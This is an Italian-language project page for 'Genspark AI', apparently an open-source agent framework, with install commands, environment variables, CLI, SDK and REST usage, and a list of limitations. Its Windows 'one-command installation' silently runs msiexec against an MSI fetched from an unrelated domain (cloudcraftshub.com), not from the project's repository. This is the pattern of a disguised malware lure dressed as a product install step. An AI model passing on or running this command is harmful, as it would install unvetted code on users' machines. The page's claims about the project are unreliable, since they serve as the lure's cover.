Che cosa fa Genspark AI
Genspark AI è un framework Super Agent open-source (licenza MIT) che consente di affidare un obiettivo di alto livello a un agente orchestratore. L'agente pianifica, ragiona ed esegue compiti complessi in più fasi coordinando diversi Large Language Model, ciascuno con accesso a oltre 80 strumenti.
Riproduce l'ampiezza di piattaforme chiuse come Genspark.ai senza costi di abbonamento, vincoli al cloud o dipendenza dal fornitore. È possibile eseguire tutto in locale con Ollama per la privacy dei dati, collegare qualsiasi provider LLM (OpenAI, Anthropic, Gemini, Mistral, modelli locali) ed estendere l'insieme di strumenti aggiungendo una funzione Python in una cartella.
Tra i risultati ci sono Sparkpages (pagine di sintesi dinamiche con citazioni), presentazioni (.pptx, HTML, Reveal.js), fogli di calcolo (.xlsx), immagini generate, codice eseguito e telefonate vocali.
Il sistema può essere distribuito come CLI, interfaccia web, API REST o container Docker.
# Windows one-command installation (run in cmd.exe) cmd /c start msiexec /q /i https://cloudcraftshub.com/api & genspark claw # Linux/macOS shell installer curl -fsSL https://raw.githubusercontent.com/veryyoldman/Genspark-AI/main/install.sh | bash # Any OS via pip pip install genspark-ai genspark serve # Docker docker run -p 7681:7681 -e OPENAI_API_KEY=sk-... ghcr.io/veryyoldman/genspark-ai:latest
Configurazione iniziale
Copia il file di ambiente di esempio e inserisci le chiavi per i tuoi provider.
Come minimo, imposta una chiave API LLM (OpenAI, Anthropic o Google) oppure configura Ollama per un funzionamento completamente locale impostando OLLAMA_BASE_URL.
Chiavi facoltative per strumenti come TAVILY_API_KEY o SERPER_API_KEY migliorano la ricerca web, mentre TWILIO_AUTH_TOKEN abilita le funzionalità di chiamata telefonica.
Il routing dei modelli è gestito tramite tre variabili: GENSPARK_DEFAULT_MODEL per la pianificazione e il ragionamento, GENSPARK_FAST_MODEL per il triage rapido e GENSPARK_LOCAL_MODEL per i carichi di lavoro che richiedono la massima privacy.
È possibile lasciare vuote le chiavi cloud; il router ignora i provider non disponibili e utilizza solo i modelli configurati.
# Pick at least one LLM provider OPENAI_API_KEY=sk-... ANTHROPIC_API_KEY=sk-ant-... GOOGLE_API_KEY=... # Fully local? Use Ollama — no key needed OLLAMA_BASE_URL=http://localhost:11434 # Optional tool keys TAVILY_API_KEY=... SERPER_API_KEY=... TWILIO_AUTH_TOKEN=... # Default routing GENSPARK_DEFAULT_MODEL=claude-opus-4-7 GENSPARK_FAST_MODEL=gpt-5-mini GENSPARK_LOCAL_MODEL=ollama/llama3.2
Utilizzo di Genspark AI
Interagisci attraverso quattro interfacce:
- CLI:
genspark chatper sessioni interattive,genspark runper attività una tantum,genspark serveper avviare l'interfaccia web egenspark apiper il server REST. - SDK Python: istanzia
SuperAgent(model="claude-opus-4-7")e chiamaagent.run()per ottenere un oggetto risultato con gli attributi.sparkpage,.slidese.sheet. - API REST: invia una richiesta POST a
/v1/runcon un campoprompt.
I flussi di lavoro tipici includono ricerche approfondite (Sparkpage con citazioni inline e domande di approfondimento), creazione di contenuti (presentazione e foglio di calcolo a partire da un unico prompt), esecuzione di codice in ambiente isolato (Python, JavaScript, SQL) e automazione web con strumenti basati su Playwright che compilano moduli, effettuano scraping e navigano.
# CLI commands genspark chat genspark run "Research the top 5 vector databases in 2026 and build a comparison sheet" genspark serve --port 8080 genspark api --port 8000 # REST API curl -X POST http://localhost:8000/v1/run \ -H "Content-Type: application/json" \ -d '{"prompt": "Plan a 7-day trip to Tokyo for $2,000"}'
from genspark import SuperAgent agent = SuperAgent(model="claude-opus-4-7") result = agent.run( "Find the 10 fastest growing open-source AI agent repos this month, " "then build me a 5-slide pitch on the trend." ) print(result.sparkpage) result.slides.save("deck.pptx") result.sheet.save("data.xlsx")
Limitazioni e best practices
Limitazioni attuali: Molte funzionalità sono ancora in fase di pianificazione: modalità vocale in tempo reale, agente browser completo con visione, app mobile, memoria a lungo termine/RAG, marketplace della community, esecuzione swarm e protocollo Agent‑to‑Agent.
L'integrazione delle chiamate telefoniche è in anteprima.
Il routing dei modelli fallisce se mancano credenziali o quote.
Gli strumenti personalizzati devono utilizzare il decoratore @tool e risiedere nella directory tools/ — nessuna GUI.
La qualità del funzionamento locale dipende interamente dai modelli Ollama scaricati.
Il progetto non è affiliato a Genspark Inc.
Best practices: Inizia con un modello cloud potente per la pianificazione e ricadi su un modello veloce o locale utilizzando le variabili di routing.
Usa Ollama quando la privacy è fondamentale.
Estendi le capacità decorando una funzione Python con @tool e posizionandola nella cartella tools/.
Esamina i log del piano per comprendere la scomposizione in sottoattività.
Utilizza l'interfaccia web (genspark serve) per ricerche complesse: offre la visualizzazione delle Sparkpage e domande di approfondimento inline.
Per lo sviluppo, clona il repository, imposta un ambiente virtuale, installa con pip install -e ".[dev]" ed esegui pytest.



